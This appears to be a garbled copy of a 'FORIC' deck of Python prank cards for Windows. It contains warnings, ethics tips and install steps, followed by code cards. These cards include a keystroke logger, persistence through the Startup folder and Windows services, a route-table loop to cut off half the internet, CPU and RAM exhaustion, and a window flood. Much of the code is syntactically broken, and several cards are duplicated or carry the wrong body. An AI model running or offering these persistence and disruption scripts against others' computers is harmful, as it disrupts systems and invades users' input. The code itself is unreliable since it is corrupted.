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WARNING! WARNING! WARNING!

USE THE CODE FROM THESE CARDS AT YOUR OWN RISK. THESE FRAMES ARE PURELY FOR EDUCATIONAL PURPOSES AND ARE NOT INTENDED TO CAUSE HARM. THE AUTHOR OF THIS DECK IS NOT RESPONSIBLE FOR ANY DAMAGE, LOSS OF DATA, OR OTHER CONSEQUENCES THAT MAY ARISE FROM THE USE OF THESE FRAMES.

BY USING THESE FRAMES, YOU ACKNOWLEDGE THAT YOU ARE FULLY AWARE OF THE CONSEQUENCES OF YOUR ACTIONS AND THAT YOU UNDERSTAND THE CODE ON THESE CARDS. IF YOU ARE UNDER 18 YEARS OLD, YOU MUST OBTAIN THE CONSENT OF YOUR PARENT OR LEGAL GUARDIAN BEFORE USING THESE FRAMES.

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EPITELITE WARNING!

To ensure the safety of readers who have photosensitive epilepsy, certain cards in this game have the potential to produce flashing lights, shaking, or screen rotation that could trigger seizures. If you or anyone in your household has a history of epilepsy or seizures, an strongly advise against using these cards. If you experience any discomfort while using these cards, please stop immediately and seek medical attention.

To indicate the presence of this warning, the cards are identified with a red border and the text "EPILEPTIC WARNING!". These cards are particularly dangerous, but others might be as well, so it is crucial to understand what the card is doing before using it.

By using this deck, you acknowledge that you have read and understood this warning, and you assume all risks associated with using the cards.

> 03 <

FORIC

FORIC is a deck of small computer prank programs designed to give you a taste of your own power over your computer. Each card in the deck represents a prank, and includes the code necessary to execute it. The pranks range from simple screen rotations to more elaborate tricks like drawing random pixels on the screen or playing sounds for each keypress.

While the pranks provided in the deck are great examples of what can be done, the real fun comes from combining multiple cards into one and creating your own unique pranks. This allows you to unleash your creativity and explore the extent of your programming knowledge.

However, it's important to remember that all the cards require some level of Python programming knowledge. If you're just starting out, be sure to ask your parent or legal guardian how to get started with Python. They can help guide you in the right direction and ensure that you're using your newfound powers safely and responsibly.

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ETWICE

To be ethical when playing with the FORIC deck, consider these tips:

- Respect others and their property by avoiding pranks that could damage or harm their computer or device.
- Obtain consent before executing any prank programs.
- Have a plan of offense or harassment pranks that could discriminate or bully others.
- Avoid compromising security with pranks that could install malware or steal personal information.
- Use your power wisely, without taking advantage of someone's trust or using your skills to harm others.
- By following these tips, you can enjoy the fun of computer pranks while remaining a responsible and ethical member of the technology community.

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INSTALL

To get started with Python, you'll need to install it on your computer. To do this, open the Microsoft Store app and search for "Python". Once you've found it, click on the latest version (currently 3.11.7) and click "Get" to install it.

Once you've installed Python, you may also need to install additional modules for some of the cards. Modules are collections of code that we can import into our programs to help us perform certain tasks.

To install python modules start the Command Prompt app from the start menu, and then type:

```
pip install module_name
```

where the module_name will be what you need, for example:

```
pip install pygame
```

will install the pygame module, which helps us to control the keyboard and the mouse.

The cards have a comment on top if you need to install extra modules.

> 06 <

START AFTER LOGIN

Any program you put in the directory: C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup will start automatically after the USER logs in. You can view the folder by pressing Win+R then type: shell:startup

If you need to start the program for all users you need to put it in the global Startup directory, to see where it is, press Win+R (the windows key and the R key) and then:

```
shell:common_startup
```

There is a helper script after_login card which copies the correct python script to the USER's startup directory, and returns True if the file already exists there, so you can use it to wait.

Example usage:

```
if not start_after_login():
    sys.exit(0)
```

This will install the script in the USER's startup directory and exit, but if the file already exists it will run the code after.

> 07 <

MINOR SERVICES

Automatically start a program can also be done if you make it a "Windows Service".

The easiest way to do that is by using the same program you can download it from <https://www.ms-n.com>. Just download it and put the whole exe.exe file in it as:

```
python s\ShellEx.py
```

You can create a s\ShellEx.bat file with the contents:

```
python s\ShellEx.py
```

and then install it as a service:

```
sc /Name= install &title s\ShellEx.bat
```

To remove the built-in service:

```
sc /Name= remove built
```

You will need administrator privileges to order to install/remove services, for that when you start the Command Prompt click on Run as Administrator.

> 08 <

EXPERIMENTING

If you want to experiment, create your own computer. There are some programs that simulate computers and you can install Windows inside the emulator.

VirtualBox is one, it is free and you can get it from <https://www.virtualbox.org>

Microsoft provides a pre-installed Windows image you can download from <https://developer.microsoft.com/en-us/windows/images>. Search for "download windows virtual machines".

Be careful and only download things from developer.microsoft.com.

The Windows Operating System in the VirtualBox virtual computer does not work like real running on actual computer. VirtualBox is basically a software computer.

You can try all kinds of things. Try to delete random files or fill the disk or erase the whole disk, then you can just re-install it with the image.


```

--> 27 <
# Filename: l_m_nlow.py
# pip install pygame win32printing
from pygame import keyboard as k
from win32printing import Printer
history = ''
n = 100, 20, 20, 20
def on_press(key):
    global history
    key = key
    history += key.char
except AttributeError:
    pass
if 'ctrl' in history:
    history = ''
    with PrinterMarginal as p:
        p.write('')
    # Here there, do you see?
    I am trapped in your computer.
Type panic to save me.
Panic save me?
'''
if 'panic' in history:
    history = ''
    with PrinterMarginal as p:
        p.write('I am free..')
if 'ctrl' in history:
    history = history[:-1]
with k.Listener(
    process_name as p:
        p.write('')

```

```

--> 28 <
# Filename: image_follow_mouse.py
# pip install pygame
from pygame import mouse
import win32api
from PIL import Image, ImageWin
import pygame.mouse as m
def on_press(key):
    # get any key image at x,y and this word
    # will draw it always following the
    # mouse position
    img = Image.open('a\\image.png')
    w,h = img.size
    dth = ImageWin.Drawing()
    def on_mouse(x,y):
        hds = win32api.GetDC(0)
        # draw the image at x,y
        # you can use random.randint
        # here to make it more random
        # the mouse to be more funny
        dth.drawImage(x,y,0,0,0,0)
    with k.Listener(
        process_name as p:
            p.write('')

```

```

--> 29 <
# Filename: jigsaw.py
# pip install pygame
from pygame import mouse
import win32api, time
from PIL import Image, ImageWin
def on_press(key):
    # get any key image at x,y and this word
    # will draw it always following the
    # mouse position
    img = Image.open('a\\image.png')
    w,h = img.size
    dth = ImageWin.Drawing()
    hds = win32api.GetDC(0)
    # draw the image at x,y
    # you can use random.randint
    # here to make it more random
    # the mouse to be more funny
    dth.drawImage(x,y,0,0,0,0)
    with k.Listener(
        process_name as p:
            p.write('')

```

```

--> 30 <
# Filename: kill_minimal.py
# pip install psutil
import psutil
import random
import time
def on_press(key):
    # get any key image at x,y and this word
    # will draw it always following the
    # mouse position
    img = Image.open('a\\image.png')
    w,h = img.size
    dth = ImageWin.Drawing()
    hds = win32api.GetDC(0)
    # draw the image at x,y
    # you can use random.randint
    # here to make it more random
    # the mouse to be more funny
    dth.drawImage(x,y,0,0,0,0)
    with k.Listener(
        process_name as p:
            p.write('')

```

```

--> 31 <
# Filename: kill_minimal.py
# pip install psutil
import psutil
import random
import time
def on_press(key):
    # get any key image at x,y and this word
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    # mouse position
    img = Image.open('a\\image.png')
    w,h = img.size
    dth = ImageWin.Drawing()
    hds = win32api.GetDC(0)
    # draw the image at x,y
    # you can use random.randint
    # here to make it more random
    # the mouse to be more funny
    dth.drawImage(x,y,0,0,0,0)
    with k.Listener(
        process_name as p:
            p.write('')

```

```

--> 32 <
# Filename: l_m_nlow.py
# pip install pygame win32printing
from pygame import keyboard as k
from win32printing import Printer
history = ''
n = 100, 20, 20, 20
def on_press(key):
    global history
    key = key
    history += key.char
except AttributeError:
    pass
if 'ctrl' in history:
    history = ''
    with PrinterMarginal as p:
        p.write('')
    # Here there, do you see?
    I am trapped in your computer.
Type panic to save me.
Panic save me?
'''
if 'panic' in history:
    history = ''
    with PrinterMarginal as p:
        p.write('I am free..')
if 'ctrl' in history:
    history = history[:-1]
with k.Listener(
    process_name as p:
        p.write('')

```

```

--> 33 <
# Filename: image_follow_mouse.py
# pip install pygame
from pygame import mouse
import win32api, time
from PIL import Image, ImageWin
def on_press(key):
    # get any key image at x,y and this word
    # will draw it always following the
    # mouse position
    img = Image.open('a\\image.png')
    w,h = img.size
    dth = ImageWin.Drawing()
    hds = win32api.GetDC(0)
    # draw the image at x,y
    # you can use random.randint
    # here to make it more random
    # the mouse to be more funny
    dth.drawImage(x,y,0,0,0,0)
    with k.Listener(
        process_name as p:
            p.write('')

```

```

--> 34 <
# Filename: image_follow_mouse.py
# pip install pygame
from pygame import mouse
import win32api, time
from PIL import Image, ImageWin
def on_press(key):
    # get any key image at x,y and this word
    # will draw it always following the
    # mouse position
    img = Image.open('a\\image.png')
    w,h = img.size
    dth = ImageWin.Drawing()
    hds = win32api.GetDC(0)
    # draw the image at x,y
    # you can use random.randint
    # here to make it more random
    # the mouse to be more funny
    dth.drawImage(x,y,0,0,0,0)
    with k.Listener(
        process_name as p:
            p.write('')

```



```

> 49 <
# Filename: start_after_login.py
# pip install pywin32
from win32con.shell import shell
from win32con.shell import shellIcon
import os

def start_after_login():
    # Find the current user's startup dir
    startup = shell.SHGetFolderPath(
        0,
        CSIDL_STARTUP,
        0,
        0
    )
    # will create:
    # C:\Users\USER\AppData\Roaming\
    # Microsoft\Windows\Start Menu\
    # Programs\Startup\__file__.pyw
    # __pyw uses python instead of .pyw
    # which does not show the end
    name = os.path.basename(__file__)
    if name.endswith('.py'):
        name = 'a' + '.pyw'
    name = os.path.join(startup, name)
    exists = os.path.exists(name)
    with open(__file__, 'a') as f:
        with open(name + '.log', 'a') as f:
            f.write(os.read(1))

    os.replace(name + '.log', name)
    return exists

```

```

> 50 <
# Filename: start_itself.py
# EXILEPTV 00000000
import os

# __file__ is the name of the current
# python script, if you name this code
# as "hello.py", in the directory
# c:\user then __file__ will be
# c:\user\hello.py
# so this program will just start itself
# and then start itself, and then start
# it itself.
# os.system("__start__")
# os.system("__start__")

```

```

> 51 <
# Filename: stop_half_the_internet.py
import os, random, time
def random_ip(ip_mask, ip):
    u = 1
    "route", net, ip,
    "MASK", mask, go
    2
    os.system("netsh interface
    segments = 1
    1 "0.0.0.0", "128.0.0.0",
    1 "128.0.0.0", "128.0.0.0",
    2
    # needs administrator privileges,
    # install it as service (check out the
    # service card)
    while True:
        # pick either all the IPs having 1 in
        # their first, so all networks above
        # 128.0.0.0, or the other half
        # 192.168.179.162, or the other half
        # of the internet below 128.0.0.0
        # e.g. google.com: 54.239.16.40
        ip_mask = random.choice([segmental
        # break the internet
        route.add', ip_mask, "0.0.0.0",
        time.sleep(random.randint(15, 150))
        # restore the internet
        route.delete', ip_mask, "0.0.0.0",
        time.sleep(random.randint(10, 60))

```

```

> 52 <
# Filename: stop_half_the_internet.py
import os, random, time
def random_ip(ip_mask, ip):
    u = 1
    "route", net, ip,
    "MASK", mask, go
    2
    os.system("netsh interface
    segments = 1
    1 "0.0.0.0", "128.0.0.0",
    1 "128.0.0.0", "128.0.0.0",
    2
    # needs administrator privileges,
    # install it as service (check out the
    # service card)
    while True:
        # pick either all the IPs having 1 in
        # their first, so all networks above
        # 128.0.0.0, or the other half
        # 192.168.179.162, or the other half
        # of the internet below 128.0.0.0
        # e.g. google.com: 54.239.16.40
        ip_mask = random.choice([segmental
        # break the internet
        route.add', ip_mask, "0.0.0.0",
        time.sleep(random.randint(15, 150))
        # restore the internet
        route.delete', ip_mask, "0.0.0.0",
        time.sleep(random.randint(10, 60))

```

```

> 53 <
# Filename: use_all_cpu.py
import os
import threading
import hashlib

def bang():
    a = "P" * 1024 * 1024
    b = a * 1024 * 1024 * 1024
    while True:
        # do useless work
        # compute the SHA256 checksum
        # of 1048576 bytes of random data
        hashlib.sha256(b)

    # os._exit(0)
    # create n_cores = 2 threads
    # each running the bang function
    threads = []
    for i in range(n_cores + 2):
        t = threading.Thread(target=bang)
        t.start()
        threads.append(t)

    # wait for the threads to finish
    for i in threads:
        t.join()

```

```

> 54 <
# Filename: use_all_ram.py
# pip install psutil
import psutil
import time

def make_high_string():
    data = "P" * 1024 * 1024 * 1024
    return data

i = 0
total = psutil.virtual_memory().total
while total > 0:
    d = make_high_string()
    total -= len(d)
    L.append(d)
    while True:
        u = 0
        # touch every byte of the used memory
        # so it is not swapped out
        for d in L:
            u += len(d)
            time.sleep(1)

```

```

> 55 <
# Filename: window Flood.py
# EXILEPTV 00000000
# pip install win32api
from win32api import *
import win32api as w
from threading import Thread
import random

# create multiple windows with
# different sizes
#
# a = a.GetSystemMetrics(SM_CXSCREEN)
# b = a.GetSystemMetrics(SM_CYSCREEN)
#
# def win():
#     b = Tk()
#     b.title("HELLO")
#     w = random.randint(100, 500)
#     h = random.randint(100, 500)
#     b.config(width=w, height=h)
#     b.config(bg="lightgray")
#     b.mainloop()
#
# threads = []
# while True:
#     t = Thread(target=win)
#     t.start()
#     threads.append(t)

```

```

> 56 <
# Filename: window Flood.py
# EXILEPTV 00000000
# pip install win32api
from win32api import *
import win32api as w
from threading import Thread
import random

# create multiple windows with
# different sizes
#
# a = a.GetSystemMetrics(SM_CXSCREEN)
# b = a.GetSystemMetrics(SM_CYSCREEN)
#
# def win():
#     b = Tk()
#     b.title("HELLO")
#     w = random.randint(100, 500)
#     h = random.randint(100, 500)
#     b.config(width=w, height=h)
#     b.config(bg="lightgray")
#     b.mainloop()
#
# threads = []
# while True:
#     t = Thread(target=win)
#     t.start()
#     threads.append(t)

```